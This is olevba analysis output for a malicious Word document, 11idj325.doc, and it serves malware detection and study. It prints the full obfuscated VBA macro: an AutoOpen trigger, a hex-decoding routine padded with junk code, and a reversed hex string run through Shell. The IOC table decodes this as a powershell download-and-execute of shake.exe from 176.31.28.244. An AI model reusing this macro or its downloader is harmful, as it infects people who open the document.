Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. XML:MASIH-- 11idj325.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 11idj325.doc
10. Type: Word2003_XML
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. ÐÎïøÏÃØÀÏÃØâûà
17. End Sub
18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
19. ANALYSIS:
20. +----------+----------+---------------------------------------+
21. | Type     | Keyword  | Description                           |
22. +----------+----------+---------------------------------------+
23. | AutoExec | AutoOpen | Runs when the Word document is opened |
24. +----------+----------+---------------------------------------+
25. -------------------------------------------------------------------------------
26. VBA MACRO ûâàûÀÀâûà.bas
27. in file: editdata.mso - OLE stream: u'VBA/\u044b\u0432\u0430\u044b\u0410\u0410\u0432\u044b\u0430'
28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
29. Dim AxygGoRiTOkuqRQaIahCglVBhig86 As Integer
30. Dim FWdUfyGGTWdgWNsQRofoGrsRaht53 As String
31. Dim wpimAVKbJvgEKauDoRaItiZPmpJ71 As Boolean
32. Dim krptyASMRGdXptpQpfAbOADHKLl37 As Double
33. Dim mcxcyBVDWKBtCDxcMehDZOMLHdw35 As Byte
34. Dim DfANDuTzoOLJgtnkAorYuhycBLh99 As Long
35. Dim MYRulblLodGLYHRflePvqhJHhaa46 As Currency
36. Dim YOjzcfRRuAoNTijUYngLCKOHXOo29 As Single
37. Dim UsSXXrkKuQMefbwdYSCyKWoczNp12 As Integer
38. Dim oawaFertGZiAGCtnnawpJqRYMpw65 As String
39. Dim GcUASXZrTtVjZkjjRlCwPuQquYy45 As Boolean
40. Dim ehWjDoUlowIphYRzymKOrWknVvk71 As Double
41. Dim tHbwbUfnrcpLLIiZhowOAWgzGlk97 As Byte
42. Dim GRGeZctPigHtTqvocYRVXWWHkiW63 As Long
43. Dim WtoXLJgHDJAIFgKMFvBREDxYnKE49 As Currency
44. Dim PPVTHAdPXpZsgnUWZedQTSJqZLL25 As Single
45. Dim qkbMHYZqOLIZHdmyojeOVPXlxXw86 As Integer
46. Dim kbRlINXrSUDZYsvpZoIJfjEhIeL41 As String
47. Dim OICjFilTZsfJkIKPufsipoOFGdB36 As Boolean
48. Dim gccpseUHWEPovokuiUEJlhPsNdL63 As Double
49. Dim aQoQtHfbJUXkNdelKuoWMsTUQWg28 As Byte
50. Dim jKLDiaSjgwltBjDHbovgTZcoYYr86 As Long
51. Dim itmeYPMBWNFuycgqjDXBhjVMOro92 As Currency
52. Dim EeRuEFbncgUdMsbrRWhpIYTdezO45 As Single
53.  
54. Public Function ÈÎèîðÌÎËûâ(ByVal PDZOFTeMMzmMjw As String) As String
55. Dim YkhbmjHCwjGfDADLJCDjxAzOCAK34, IiJADFAaDZrNiUgiPfKlZRRjwVS68 As Integer
56. IiJADFAaDZrNiUgiPfKlZRRjwVS68 = 2164
57. For YkhbmjHCwjGfDADLJCDjxAzOCAK34 = 0 To 35
58. IiJADFAaDZrNiUgiPfKlZRRjwVS68 = IiJADFAaDZrNiUgiPfKlZRRjwVS68 + YkhbmjHCwjGfDADLJCDjxAzOCAK34
59. DoEvents
60. Next YkhbmjHCwjGfDADLJCDjxAzOCAK34
61.  
62. Dim hYlCzZmShpxesNYFktdcasEAVty15, wxOFaXIGlXMIqoVdjbqthiQvFjI13 As Integer
63. wxOFaXIGlXMIqoVdjbqthiQvFjI13 = 5447
64. For hYlCzZmShpxesNYFktdcasEAVty15 = 0 To 36
65. wxOFaXIGlXMIqoVdjbqthiQvFjI13 = wxOFaXIGlXMIqoVdjbqthiQvFjI13 + hYlCzZmShpxesNYFktdcasEAVty15
66. DoEvents
67. Next hYlCzZmShpxesNYFktdcasEAVty15
68.  
69. Dim KIeMXoAYAtGBqiQgALSWLvhkjVw15, lZShIiVKOjBvaVmcUOQjDcfqSOf83 As Integer
70. lZShIiVKOjBvaVmcUOQjDcfqSOf83 = 7486
71. For KIeMXoAYAtGBqiQgALSWLvhkjVw15 = 0 To 17
72. lZShIiVKOjBvaVmcUOQjDcfqSOf83 = lZShIiVKOjBvaVmcUOQjDcfqSOf83 + KIeMXoAYAtGBqiQgALSWLvhkjVw15
73. DoEvents
74. Next KIeMXoAYAtGBqiQgALSWLvhkjVw15
75.  
76.  
77. For GBfuNiAvl = 1 To Len(PDZOFTeMMzmMjw) Step 2
78. rIvzZMKEQTqM = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(PDZOFTeMMzmMjw, GBfuNiAvl, 2)))
79. rnyBQmn = rnyBQmn & rIvzZMKEQTqM
80. Next GBfuNiAvl
81. ÈÎèîðÌÎËûâ = rnyBQmn
82. End Function
83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
84. ANALYSIS:
85. +------------+---------+-----------------------------------------+
86. | Type       | Keyword | Description                             |
87. +------------+---------+-----------------------------------------+
88. | Suspicious | Chr     | May attempt to obfuscate specific       |
89. |            |         | strings                                 |
90. +------------+---------+-----------------------------------------+
91. -------------------------------------------------------------------------------
92. VBA MACRO êóåÀàïûâà.bas
93. in file: editdata.mso - OLE stream: u'VBA/\u043a\u0443\u0435\u0410\u0430\u043f\u044b\u0432\u0430'
94. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
95.  
96.    
97.    
98.  
99. Sub ÐÎïøÏÃØÀÏÃØâûà()
100. øÈÐîìðîûâàÀ = ÈÎèîðÌÎËûâ(StrReverse("B3568756E2643746834783947455965786C55205D454455202472716473702B3568756E2643746834783947455965786C55205D454455202261636E2643746834783947455965786C55205D45445520246E61607875602B39272261636E2643746834783947455965786C55205D454455272C272568756E256B6168637F297A7F6F6D637F2434323E28323E21333E2637313F2F2A307474786728256C696644616F6C6E677F644E29247E65696C634265675E24756E4E2D6564737973502473656A626F4D27756E4820256C69666F62707F6E6D20237371607972602973696C6F605E6F696475736568754D202568756E2C6C6568637275677F60702B4F20246D636"))
101.      ãíÃÏÎûâàà = Shell(øÈÐîìðîûâàÀ, 0)
102. End Sub
103.  
104.  
105. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
106. ANALYSIS:
107. +------------+----------------------+-----------------------------------------+
108. | Type       | Keyword              | Description                             |
109. +------------+----------------------+-----------------------------------------+
110. | Suspicious | Shell                | May run an executable file or a system  |
111. |            |                      | command                                 |
112. | Suspicious | StrReverse           | May attempt to obfuscate specific       |
113. |            |                      | strings                                 |
114. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
115. |            |                      | be used to obfuscate strings (option    |
116. |            |                      | --decode to see all)                    |
117. | IOC        | http://176.31.28.244 | URL (obfuscation: StrReverse+Hex)       |
118. |            | /smoozy/shake.exe',' |                                         |
119. |            | %TEMP%\huiUGI8t8dsF. |                                         |
120. |            | cab'                 |                                         |
121. | IOC        | 176.31.28.244        | IPv4 address (obfuscation:              |
122. |            |                      | StrReverse+Hex)                         |
123. | IOC        | powershell.exe       | Executable file name (obfuscation:      |
124. |            |                      | StrReverse+Hex)                         |
125. | IOC        | shake.exe            | Executable file name (obfuscation:      |
126. |            |                      | StrReverse+Hex)                         |
127. | IOC        | huiUGI8t8dsF.exe     | Executable file name (obfuscation:      |
128. |            |                      | StrReverse+Hex)                         |
129. +------------+----------------------+-----------------------------------------+